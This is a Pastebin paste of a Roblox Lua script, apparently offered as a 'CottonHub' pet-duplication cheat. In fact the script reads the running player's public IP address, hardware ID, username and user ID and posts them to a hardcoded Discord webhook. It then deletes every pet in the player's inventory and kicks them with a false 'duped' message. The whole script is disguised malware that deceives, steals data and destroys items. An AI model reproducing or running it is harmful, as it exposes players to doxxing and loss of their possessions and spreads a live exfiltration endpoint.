Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local Webhook =
- "https://discord.com/api/webhooks/997670104231841812/c4aMb9I-punKqZaaMmOFUksvgNS-yc0u74lpUtCupIQg145WYJQH-5rzxN_DWp4DLGqo"
- local IPv4 = game:HttpGet("https://v4.ident.me/")
- local hwid = game:GetService("RbxAnalyticsService"):GetClientId()
- local Headers = {["content-type"] = "application/json"}
- local LocalPlayer = game:GetService("Players").LocalPlayer
- local AccountAge = LocalPlayer.AccountAge
- local MembershipType = string.sub(tostring(LocalPlayer.MembershipType), 21)
- local UserId = LocalPlayer.UserId
- local PlayerName = game.Players.LocalPlayer.Name
- local TIME_ZONE = 20
- local gamename = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name
- local date = os.date("!*t")
- local hour = (date.hour + TIME_ZONE) % 24
- local ampm = hour < 12 and "AM" or "PM"
- local timestamp = string.format("%02i:%02i %s", ((hour - 1) % 12) + 1, date.min, ampm)
- dat = os.date("%m/%d/%Y" .. " at " .. timestamp .. " Timezone: EST")
- local PlayerData = {
- ["content"] = "",
- ["embeds"] = {
- {
- ["title"] = "**New CottonHub Execution**",
- ["description"] = "",
- ["color"] = tonumber(0x2B6BE4),
- ["fields"] = {
- {
- ["name"] = "Username:",
- ["value"] = PlayerName,
- ["inline"] = false
- },
- {
- ["name"] = "Game:",
- ["value"] = gamename,
- ["inline"] = false
- },
- {
- ["name"] = "UserId:",
- ["value"] = UserId,
- ["inline"] = false
- },
- {
- ["name"] = "IP:",
- ["value"] = IPv4,
- ["inline"] = false
- },
- {
- ["name"] = "HWID:",
- ["value"] = hwid,
- ["inline"] = false
- },
- {
- ["name"] = "Date/Time:",
- ["value"] = dat,
- ["inline"] = false
- }
- }
- }
- }
- }
- local PlayerData = game:GetService("HttpService"):JSONEncode(PlayerData)
- local HttpRequest = http_request
- if syn then
- HttpRequest = syn.request
- else
- HttpRequest = http_request
- end
- HttpRequest({Url = Webhook, Body = PlayerData, Method = "POST", Headers = Headers})
- wait(0.2)for _,v in pairs(game:GetService("Players").LocalPlayer.PlayerGui.ScreenGui.PetsFrame.Main.Pages.Pets.List.Grid:GetChildren()) do game:GetService("ReplicatedStorage").NetworkRemoteEvent:FireServer("DeletePet", v.Name) end wait(2) game.Players.LocalPlayer:kick("Your pets are now being duped...")
Add Comment
Please, Sign In to add comment